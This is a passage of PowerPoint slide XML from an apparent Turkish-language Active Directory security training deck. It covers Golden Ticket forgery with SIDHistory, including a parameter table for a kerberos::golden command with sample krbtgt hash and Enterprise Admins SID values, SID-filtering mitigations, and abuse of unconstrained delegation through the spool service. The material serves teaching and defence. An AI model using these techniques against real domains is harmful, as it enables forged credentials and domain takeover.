                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1212607450"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4103083">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4059849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Parametre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Açıklama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Değer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189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kerberos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t>::golden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Golden Ticket </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>modülü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158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/user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Impersonate </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>edilecek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kullanıcı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ismi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root123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408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/domain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Kullanıcının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bulunduğu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t> domain </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>adı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INTERNAL.LOCAL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059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/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>sid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Kullanıcının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bulunduğu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t> domain SID </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>değeri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S-1-5-21-1234564456-3701834485-3839312249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161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/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>krbtgt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Krbtgt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NTHash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değeri</a:t>
                      </a:r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3b4d99def89329ace111fb148acb629f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487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/id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Impersonate </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>edilecek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kullanıcı</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t> RID </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>değeri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623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/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>sids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SIDHistory’e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eklenecek</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t> SID </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>değeri</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0"/>
                        <a:t> (Enterprise Admins)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S-1-5-21-246663577-1172385535-561243890-519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380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/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>ptt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Pass the Ticket </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
                        <a:t>modülü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852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44560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E85CB-B2A7-A656-79E1-C3B5EA999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TTP 0x18 – Golden Ticket w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> - Exploitation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09DB62-E22F-D927-4EF7-B578A5CCA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795" y="1762125"/>
            <a:ext cx="11628409" cy="380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2722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DF5A2-C8E2-E705-31F6-543F9A270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TTP 0x18 – Golden Ticket w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Mitigation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C7FC1-0893-69E3-D4FA-B8B3A8108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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>saldırıyı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>önlemek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>trustlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SID Filtering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mekanizmasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> hale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>getirmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerekmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>önlemin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>normalde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aynı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> forest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>içerisindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>domainler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulanması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>önerilmemektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Çünkü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Domain Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tarafından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güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sınırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (security boundary) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>görülmemektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>öncelikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>güvensiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>adlandırıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>farklı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Foresta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>taşınmalı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sonra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Forestlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oluşturulmalıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bunun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>öncelikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>domainler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>arası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iletişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulamaların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesapların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sonra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>önlemin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>alınması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerekmektedir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39871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8CD8F-63F6-6609-A339-E28EB93F2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sz="4000" dirty="0"/>
              <a:t>TTP 0x20 – Unconstrained Delegation w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Spoolsvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000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C93638-F36C-6EFC-473C-E0C5DED11A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97665"/>
            <a:ext cx="10515600" cy="32072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38702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3D6E3-06A5-2DF5-0D21-7EE4B7721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TTP 0x20 – Unconstrained Delegation w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Spoolsvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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64422-09CE-5943-F2AE-FBC18A99F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Unconstrained Delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tanımlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişen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obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> TGS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bileti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sıra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>biletini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>göndermektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Spool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinden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sunucudan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>diğerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kimlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>doğrulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>isteği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yaptırılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Unconstrained Delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aktif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makine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirildiğinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>aynı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>farklı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> forest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>içerisindeki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domainin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusundaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Spool Servis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>zafiyeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tetiklenerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>makineye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>istek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yaptırılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>istekle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>birlikte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> o DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusunun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>makine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesabına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bileti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iletilecektir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. Bu TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bileti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edilerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hedef</a:t>
            </a:r>
            <a:r>
